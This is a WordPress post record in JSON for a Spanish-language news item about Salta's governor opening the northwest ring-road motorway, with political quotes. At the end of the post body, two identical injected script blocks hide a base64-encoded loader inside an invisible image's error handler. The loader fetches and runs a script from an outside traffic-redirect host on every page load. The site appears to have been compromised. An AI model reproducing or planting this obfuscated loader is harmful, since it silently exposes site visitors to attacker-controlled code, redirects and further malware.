{"id":3719,"date":"2024-02-16T10:37:43","date_gmt":"2024-02-16T13:37:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3719"},"modified":"2025-08-14T00:00:22","modified_gmt":"2025-08-14T03:00:22","slug":"saenz-inauguro-la-circunvalacion-noroeste-la-obra-mas-importante-de-los-ultimos-20-anos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3719","title":{"rendered":"S\u00e1enz inaugur\u00f3 la circunvalaci\u00f3n noroeste, la obra m\u00e1s importante de los \u00faltimos 20 a\u00f1os"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-1cf74f631a8693c161b5076d3ebaf700\" style=\"background-color:#9b0d41\"><em>La autopista de 5 Km se ejecut\u00f3 con fondos, empresas y mano de obra salte\u00f1a. \u201cEs un orgullo decir a los que tienen una visi\u00f3n centralista, lo que podemos hacer con nuestros recursos cuando son bien utilizados; la obra p\u00fablica dignifica\u201d, dijo el Gobernador.<\/em><\/h4>\n\n\n\n<p>\u201cEsta es la obra m\u00e1s importante de los \u00faltimos 20 a\u00f1os\u201d, dijo el gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;al inaugurar la nueva autopista de la circunvalaci\u00f3n noroeste que se extiende desde la ruta 28 hasta avenida Bolivia, con sus respectivos nudos viales.<\/p>\n\n\n\n<p>\u201cHoy es un d\u00eda hist\u00f3rico\u201d, manifest\u00f3 el Gobernador tras cortar las cintas para habilitar el tr\u00e1nsito en la nueva traza que tiene cinco kil\u00f3metros de longitud; dos calzadas de 7,40 metros, banquinas; cantero central con talud, desag\u00fces, iluminaci\u00f3n LED, ciclov\u00eda y se\u00f1alizaci\u00f3n horizontal y vertical.<\/p>\n\n\n\n<p>Adem\u00e1s cuenta con dos puentes para dar continuidad y paso independiente a los equipos y operaciones que se desarrollan en los campos del Ej\u00e9rcito Argentino.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10944-inauguracion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10944-inauguracion.jpg\" alt=\"Inauguraci\u00f3n\" style=\"width:292px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cEsta obra emblem\u00e1tica, so\u00f1ada y tan pedida se hizo con fondos propios, con empresas y mano de obra salte\u00f1a\u201d, indic\u00f3 el Gobernador. Agreg\u00f3: \u201cEs un orgullo decir a los que tienen una visi\u00f3n centralista, lo que podemos hacer con nuestros recursos cuando son bien utilizados; la obra p\u00fablica dignifica\u201d.<\/p>\n\n\n\n<p>A aquellos \u201cque piensan que la Argentina comienza y termina en la General Paz\u201d, S\u00e1enz advirti\u00f3: \u201cVamos a pelear por los derechos de los salte\u00f1os; ac\u00e1 hay un gigante dormido que se est\u00e1 comenzando a despertar y se va a poner de pie, no de rodillas, nunca\u201d. Y a que los que viven en Capital Federal les dijo: \u201csalgan de sus escritorios y vengan a conocer las necesidades del Norte de la Patria\u201d.<\/p>\n\n\n\n<p>Dirigi\u00e9ndose al presidente Javier Milei consider\u00f3 que \u201ctiene la oportunidad hist\u00f3rica de que hayan argentinos iguales, con las mismas oportunidades; no de primera y de segunda\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10945-inauguracion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10945-inauguracion.jpg\" alt=\"Inauguraci\u00f3n\" style=\"width:334px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En esta l\u00ednea pregunt\u00f3: \u201c\u00bfC\u00f3mo van a venir las industrias a instalarse ac\u00e1 si no les damos las mismas posibilidades que en el centro del pa\u00eds?\u201d. As\u00ed se refiri\u00f3 a que en el interior se paga tres veces m\u00e1s el boleto de colectivo, el gas, la electricidad, adem\u00e1s de falta de rutas y conectividad.&nbsp;<\/p>\n\n\n\n<p>\u201cNo es culpa nuestra vivir a 1600 kil\u00f3metros de Capital\u201d, se\u00f1al\u00f3 y puntualiz\u00f3 que desde donde naci\u00f3 la Patria con el General G\u00fcemes y sus gauchos \u201cseguiremos con esa lucha que nos dio una Naci\u00f3n libre, soberana, justa y sobre todo federal. No nos arrodillaremos ante nadie\u201d.<\/p>\n\n\n\n<p>Y continu\u00f3: \u201cAc\u00e1 no hay traidores ni mentirosos, sino gente de bien que est\u00e1n pagando el ajuste, las consecuencias de los que se enriquecieron y se llevaron la plata a otro lado. Pers\u00edganlos a ellos porque los que la est\u00e1n pasando mal son los jubilados\u201d.<\/p>\n\n\n\n<p>Asimismo afirm\u00f3 que se pondr\u00e1 al lado de los maestros y la defensa del Fondo de Incentivo Docente, \u201cque fue su lucha y su logro\u201d.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10946-inauguracion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10946-inauguracion.jpg\" alt=\"Inauguraci\u00f3n\"\/><\/a><\/figure>\n\n\n\n<p>Por su parte, el ministro de Infraestructura&nbsp;<strong>Sergio Camacho<\/strong>&nbsp;destac\u00f3 la satisfacci\u00f3n de haber concretado la obra que favorecer\u00e1 no solo a la capital provincial sino tambi\u00e9n al \u00e1rea metropolitana.&nbsp;<\/p>\n\n\n\n<p>\u201cY en tiempos tan dif\u00edciles como los que nos toca vivir y con tanta informaci\u00f3n negativa es una alegr\u00eda que este Gobierno haya podido ejecutar este proyecto. Como lo dice el Gobernador, no son solo palabras sino hechos y lo m\u00e1s importante son los hechos\u201d, indic\u00f3 el funcionario quien tambi\u00e9n est\u00e1 a cargo de la Coordinaci\u00f3n de Enlace y Relaciones Pol\u00edticas.&nbsp;<\/p>\n\n\n\n<p>Camacho puso \u00e9nfasis en que el Ejecutivo no descuida el interior de la provincia, \u201cdonde en cada lugar tenemos una obra y la garantizaremos de la mejor forma posible, independientemente de la visi\u00f3n que el Gobierno nacional tenga sobre la obra p\u00fablica. El empe\u00f1o es concluir con absolutamente todas las obras que est\u00e1n iniciadas y al mismo tiempo encontrar el camino y la forma para seguir como nos indica el Gobernador\u201d.<\/p>\n\n\n\n<p>El proyecto integral contempla la construcci\u00f3n del paso bajo nivel en el acceso a barrio Grand Bourg, el cual ya se encuentra habilitado, y la repavimentaci\u00f3n de la ruta provincial 28 desde el templete San Cayetano hasta San Lorenzo, que se prev\u00e9 iniciar luego de la temporada de lluvias.<\/p>\n\n\n\n<p>Estuvieron presentes el vicegobernador Antonio Marocco, el intendente de la Ciudad de Salta Emiliano Durand, el comandante de la Quinta Brigada de Monta\u00f1a Sebasti\u00e1n Ib\u00e1\u00f1ez, ministros, secretarios y funcionarios del Ejecutivo Provincial y municipal, legisladores nacionales y provinciales y concejales.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"S\u00e1enz inaugur\u00f3 la circunvalaci\u00f3n noroeste, la obra m\u00e1s importante de los \u00faltimos 20 a\u00f1os\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/h6HjFyGKZpA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/saenz-inauguro-la-circunvalacion-noroeste-la-obra-mas-importante-de-los-ultimos-20-anios-94215\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La autopista de 5 Km se ejecut\u00f3 con fondos, empresas y mano de obra salte\u00f1a. \u201cEs un orgullo decir a los que tienen una visi\u00f3n centralista, lo que podemos hacer con nuestros recursos cuando son bien utilizados; la obra p\u00fablica dignifica\u201d, dijo el Gobernador. \u201cEsta es la obra m\u00e1s importante de los \u00faltimos 20 a\u00f1os\u201d, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3720,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-3719","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3719"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3719"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3719\/revisions"}],"predecessor-version":[{"id":6849,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3719\/revisions\/6849"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3720"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3719"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3719"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3719"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}